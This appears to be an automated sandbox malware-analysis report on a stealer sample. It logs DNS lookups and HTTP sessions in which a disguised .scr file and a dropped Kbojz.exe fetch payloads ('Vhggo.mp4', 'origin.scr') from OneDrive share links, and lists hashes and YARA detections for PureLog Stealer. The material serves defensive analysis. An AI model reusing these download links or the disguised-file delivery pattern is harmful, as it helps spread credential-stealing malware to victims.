                                                                                                                                                  Apr 19, 2024 16:17:16.805298090 CEST8.8.8.8192.168.2.220x4f6cNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.805298090 CEST8.8.8.8192.168.2.220x4f6cNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.805298090 CEST8.8.8.8192.168.2.220x4f6cNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.890840054 CEST8.8.8.8192.168.2.220x962aNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.890840054 CEST8.8.8.8192.168.2.220x962aNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.916865110 CEST8.8.8.8192.168.2.220x9becNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.916865110 CEST8.8.8.8192.168.2.220x9becNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.916865110 CEST8.8.8.8192.168.2.220x9becNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.916865110 CEST8.8.8.8192.168.2.220x9becNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:16.916865110 CEST8.8.8.8192.168.2.220x9becNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:17.062417030 CEST8.8.8.8192.168.2.220xfafaNo error (0)public.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:17.062417030 CEST8.8.8.8192.168.2.220xfafaNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.435774088 CEST8.8.8.8192.168.2.220x87edNo error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.435774088 CEST8.8.8.8192.168.2.220x87edNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.559691906 CEST8.8.8.8192.168.2.220x87edNo error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.559691906 CEST8.8.8.8192.168.2.220x87edNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.670228958 CEST8.8.8.8192.168.2.220x87edNo error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.670228958 CEST8.8.8.8192.168.2.220x87edNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.777476072 CEST8.8.8.8192.168.2.220x87edNo error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.777476072 CEST8.8.8.8192.168.2.220x87edNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.906522989 CEST8.8.8.8192.168.2.220xd3e4No error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:18.906522989 CEST8.8.8.8192.168.2.220xd3e4No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:19.028656960 CEST8.8.8.8192.168.2.220xd3e4No error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:19.028656960 CEST8.8.8.8192.168.2.220xd3e4No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:19.135179043 CEST8.8.8.8192.168.2.220xd3e4No error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:19.135179043 CEST8.8.8.8192.168.2.220xd3e4No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.561292887 CEST8.8.8.8192.168.2.220xa82dNo error (0)skydrive.live.comodwebpl.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.561292887 CEST8.8.8.8192.168.2.220xa82dNo error (0)odsp-odweb-odcfe-lb.nameastus2946819.odsp-odweb-odcfe.eastus2-prod.cosmic.office.netcosmic-eastus2-ns-8a58b1860b73.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.713864088 CEST8.8.8.8192.168.2.220xa82dNo error (0)skydrive.live.comodwebpl.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.713864088 CEST8.8.8.8192.168.2.220xa82dNo error (0)odsp-odweb-odcfe-lb.nameastus9685829.odsp-odweb-odcfe.eastus-prod.cosmic.office.netcosmic-eastus-ns-75bf60968b55.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.923724890 CEST8.8.8.8192.168.2.220xa82dNo error (0)skydrive.live.comodwebpl.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:20.923724890 CEST8.8.8.8192.168.2.220xa82dNo error (0)odsp-odweb-odcfe-lb.nameastus2300077.odsp-odweb-odcfe.eastus-prod.cosmic.office.netcosmic-eastus-ns-9067974ac67b.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:21.098366022 CEST8.8.8.8192.168.2.220xa82dNo error (0)skydrive.live.comodwebpl.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:21.098366022 CEST8.8.8.8192.168.2.220xa82dNo error (0)odsp-odweb-odcfe-lb.nameastus2708987.odsp-odweb-odcfe.eastus2-prod.cosmic.office.netcosmic-eastus2-ns-d2d9c8d5cfc0.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:21.269529104 CEST8.8.8.8192.168.2.220xa82dNo error (0)skydrive.live.comodwebpl.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:21.269529104 CEST8.8.8.8192.168.2.220xa82dNo error (0)odsp-odweb-odcfe-lb.nameastus2946819.odsp-odweb-odcfe.eastus2-prod.cosmic.office.netcosmic-eastus2-ns-8a58b1860b73.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:29.212724924 CEST8.8.8.8192.168.2.220x1848Name error (3)63.155.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:29.317672014 CEST8.8.8.8192.168.2.220x1848Name error (3)63.155.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:29.423091888 CEST8.8.8.8192.168.2.220x1848Name error (3)63.155.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:29.528367996 CEST8.8.8.8192.168.2.220x1848Name error (3)63.155.11.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.779114008 CEST8.8.8.8192.168.2.220xb268No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.779114008 CEST8.8.8.8192.168.2.220xb268No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.779114008 CEST8.8.8.8192.168.2.220xb268No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.779114008 CEST8.8.8.8192.168.2.220xb268No error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.779114008 CEST8.8.8.8192.168.2.220xb268No error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.900000095 CEST8.8.8.8192.168.2.220xb708No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.900000095 CEST8.8.8.8192.168.2.220xb708No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.900000095 CEST8.8.8.8192.168.2.220xb708No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-dc-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.900000095 CEST8.8.8.8192.168.2.220xb708No error (0)dual-spov-0006.spov-dc-msedge.net150.171.41.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:46.900000095 CEST8.8.8.8192.168.2.220xb708No error (0)dual-spov-0006.spov-dc-msedge.net150.171.43.11A (IP address)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.500559092 CEST8.8.8.8192.168.2.220x1981No error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.500559092 CEST8.8.8.8192.168.2.220x1981No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.621754885 CEST8.8.8.8192.168.2.220x1981No error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.621754885 CEST8.8.8.8192.168.2.220x1981No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.728013992 CEST8.8.8.8192.168.2.220x1981No error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.728013992 CEST8.8.8.8192.168.2.220x1981No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.833484888 CEST8.8.8.8192.168.2.220x1981No error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.833484888 CEST8.8.8.8192.168.2.220x1981No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.939300060 CEST8.8.8.8192.168.2.220x1981No error (0)utqurw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  Apr 19, 2024 16:17:48.939300060 CEST8.8.8.8192.168.2.220x1981No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                  • onedrive.live.com
                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  0192.168.2.224917113.107.137.114433224C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-19 14:16:44 UTC129OUTGET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-04-19 14:16:44 UTC1171INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://public.am.files.1drv.com/y4m330KkpvSU2_5eIEzg9ufJvqrZWwMg94qIz09bT9nMltWjECZH4Cu2Zuuu5jzPmspcbCYit5eYAE1ybtlaiEyt7dBUuipCc2XQxTHbojjXjIwqFrJSMA5RqjSSE4u_6CCR-dAUJunuQWUSYQ35h9AjmqTYarp0U6GBqEQR8bc50QqPJWVe9p6p2SMEru_1MhF9uuMQrCiD32h0_j7vP6NYw/Vhggo.mp4?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:k+s9V3tg3Ig=:BX4zcCgEOlbJB6p+/m76QQMg0uLnZ/G21vAaiM0RsPg=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=aa1087f4-341f-43c1-9175-32b04566aa45&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:36:44 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:16:44 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 5fd6fc6db4-6dwr7
                                                                                                                                                  X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: 1D96AA48284B4A9D9C765BA0DC3A3F4F Ref B: BN3EDGE0822 Ref C: 2024-04-19T14:16:44Z
                                                                                                                                                  Date: Fri, 19 Apr 2024 14:16:44 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.224917213.107.137.114433224C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-19 14:16:47 UTC129OUTGET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-04-19 14:16:47 UTC1171INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://public.am.files.1drv.com/y4mwFu8VbGByM_Q7z-aa3kXSHpyVeSwXW2bYOApH-e631-D-8uUIicootAywp08FoH81YRjxNfV8hCP3xSVy9f23NbiY09zB0_yJ37bQUuIDpC-06Ih9Qe7jL-MoeIUgOzmKakMY3-WhCRl0Y2P1pgrzHwu-MFKAiw9TE3wJ4ZbnEB74kLbrehBDQarp5Gp6tYKkmH2Acue7mieN_bJ8MSlzA/Vhggo.mp4?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:BdgXWXtg3Ig=:DIto+ZxSGkLTOocpE0k1vAoj7/eNN6VU9NoKz5RTgyA=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=b39f5967-1a88-4529-98aa-595f59c4550f&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:36:47 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:16:47 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 5fd6fc6db4-c6vb8
                                                                                                                                                  X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: BE24B4FC6E1D429AB1E48F750FA0B4BA Ref B: BN3EDGE0511 Ref C: 2024-04-19T14:16:47Z
                                                                                                                                                  Date: Fri, 19 Apr 2024 14:16:47 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.224917513.107.137.114433552C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-19 14:17:07 UTC129OUTGET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-04-19 14:17:08 UTC1171INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://public.am.files.1drv.com/y4mQE8Cn-ey22tLqFzNP6Bvc0YOHW16UYVvHKAtb_HbiHHBX320gCSUBo3NE91NAaiUAQmg8Nbiivg1yPXAGH6v27TTmlKBVv-073G6ZiVXzDsuOkdNuJdxsUblirTwudCsrvXLiIxW8pukSbQDJBU0G0VTQgIrwwJLLC9iaBHsovUud7otogTkUv_eJuu9AUZGkxSelbm1lRHM-KTz3-v-4g/Vhggo.mp4?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:fuVTZXtg3Ig=:d+NPprUU5s6Trbg4OC6yufJZyrUUNiFVjp/2eTVO5vY=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=061dfda0-862e-4227-bf01-f86f7242e6f6&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:37:07 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:17:08 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 676c7b6ddb-m4n68
                                                                                                                                                  X-ODWebServer: nameastus2708987-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: A4C9EF305CEC4222A34A65790C8B8A2C Ref B: BN3EDGE0312 Ref C: 2024-04-19T14:17:07Z
                                                                                                                                                  Date: Fri, 19 Apr 2024 14:17:08 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.224917813.107.137.114433652C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-19 14:17:16 UTC129OUTGET /download?resid=26943FEBC022618F%21479&authkey=!APRD0RAPKJuy4WE HTTP/1.1
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-04-19 14:17:16 UTC1171INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://public.am.files.1drv.com/y4msme9eT8kXrOR-7wV9kiBohdMur1Lbs151ysdQuqKOSsl3mAiWGdSV3LP6WqYY9vaEmOeEaKNNaWVRUIPhB_Blfj8yVRyJ6BjzR4sn5wge-umfDwOTsFL9AbGqDVT1jVd0rM5IYv-t4mgApw-LuJkybdtukHbPFOWObLH67dfDOLOd_xpdmsCj1hSlEq0DUB90gKTha2G-cWPlkEsTZ0dww/Vhggo.mp4?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:aAVvantg3Ig=:KdQd9YRzT74bjky3qew+rBL8ZQP1ibwWK5/kEfZ6R8M=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=991bff75-a086-4591-86e1-578eb56155cd&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:37:16 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:17:16 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 5fd6fc6db4-6dwr7
                                                                                                                                                  X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: 3F564190A34F4BA8B6C5589CD8AC88E0 Ref B: BN3EDGE0918 Ref C: 2024-04-19T14:17:16Z
                                                                                                                                                  Date: Fri, 19 Apr 2024 14:17:16 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.224917913.107.137.114433372C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-19 14:17:17 UTC129OUTGET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-04-19 14:17:18 UTC1172INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://utqurw.am.files.1drv.com/y4mFbMW97TPAIW_iquyB-Ao69Foeiu4Lp0Em3x5_9O_Ik0LysS9rZcK8ox-X1EantadX6zPJmPeLGvn8sMZEkdzWf316jERXkan1Q16OefutHcuGhocvuHjn3H8p_Izp5tXJT2YIxFPkMbQhZkbUj3qPOR-CDNi7iP1MwDiO8cqS4T6od19eItzzwNuM6Cd9QwEzNYR-jshSSJr9NHbP-uKTA/origin.scr?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:Xw9Aa3tg3Ig=:JT+LJxbD/EnasXmJh/npw18spUw9uUbhb4HTpOU5wSU=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=2f75faa7-51f6-49b1-905b-e93f032eb20e&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:37:17 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:17:18 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 5fd6fc6db4-4qw5w
                                                                                                                                                  X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: D2512EE78FED43E19990237B3ECB9651 Ref B: BN3EDGE0217 Ref C: 2024-04-19T14:17:17Z
                                                                                                                                                  Date: Fri, 19 Apr 2024 14:17:17 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.2249184150.171.41.114433840C:\Users\user\AppData\Roaming\Kbojz.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-04-19 14:17:47 UTC129OUTGET /download?resid=26943FEBC022618F%21481&authkey=!AJjxgOKv6NEIF-A HTTP/1.1
                                                                                                                                                  Host: onedrive.live.com
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2024-04-19 14:17:48 UTC1176INHTTP/1.1 302 Found
                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: text/html
                                                                                                                                                  Expires: -1
                                                                                                                                                  Location: https://utqurw.am.files.1drv.com/y4ms_vWzniFUJaBcF0Y1jNwvuu_3iedMM7s1JmtuLb_AtOzVrcYjTWzJYemZ-gol7I6RGKjZschyrQhjAKimK1xLdYcfyjUcdIjmXB9U6RVFKMtOfxS_yxsIqr4_2Dn5pWe6FB3nf-ZRd-Vdfk7Zek0qdCjtBktsgzZiQiRZWqkaV0wp2YAK5pRG8MfMkzHNgxFdKkf-gd0Cr4XSlkfbrmcQA/origin.scr?download&psid=1
                                                                                                                                                  Set-Cookie: E=P:MrX8fHtg3Ig=:Vk/OiM5weglIgwYxtwolURFdXSi85Hnqyu9ijMVGAa4=:F; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xid=b749387f-6e04-4b27-8eaf-5723695edfd6&&ODSP-ODWEB-ODCF&147; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                                  Set-Cookie: LD=; domain=.live.com; expires=Fri, 19-Apr-2024 12:37:47 GMT; path=/
                                                                                                                                                  Set-Cookie: wla42=; domain=live.com; expires=Fri, 26-Apr-2024 14:17:48 GMT; path=/
                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                  X-MSNServer: 59d5745476-pgbg9
                                                                                                                                                  X-ODWebServer: nameastus2300077-odwebpl
                                                                                                                                                  X-Cache: CONFIG_NOCACHE
                                                                                                                                                  X-MSEdge-Ref: Ref A: E780DEC70D74464EA96781016A9834A3 Ref B: BL2AA2010202021 Ref C: 2024-04-19T14:17:47Z
                                                                                                                                                  Date: Fri, 19 Apr 2024 14:17:47 GMT
                                                                                                                                                  Connection: close
                                                                                                                                                  Content-Length: 0


                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                  Click to jump to process

                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:16:16:40
                                                                                                                                                  Start date:19/04/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\UGS - CRO REQ - KHIDUBAI (OPL-841724).scr" /S
                                                                                                                                                  Imagebase:0x80000
                                                                                                                                                  File size:37'688 bytes
                                                                                                                                                  MD5 hash:F99DC4D2E045AE0BBC169FFF12A5C6D5
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.359357988.0000000006010000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.356481377.00000000021F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.359476734.0000000007180000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
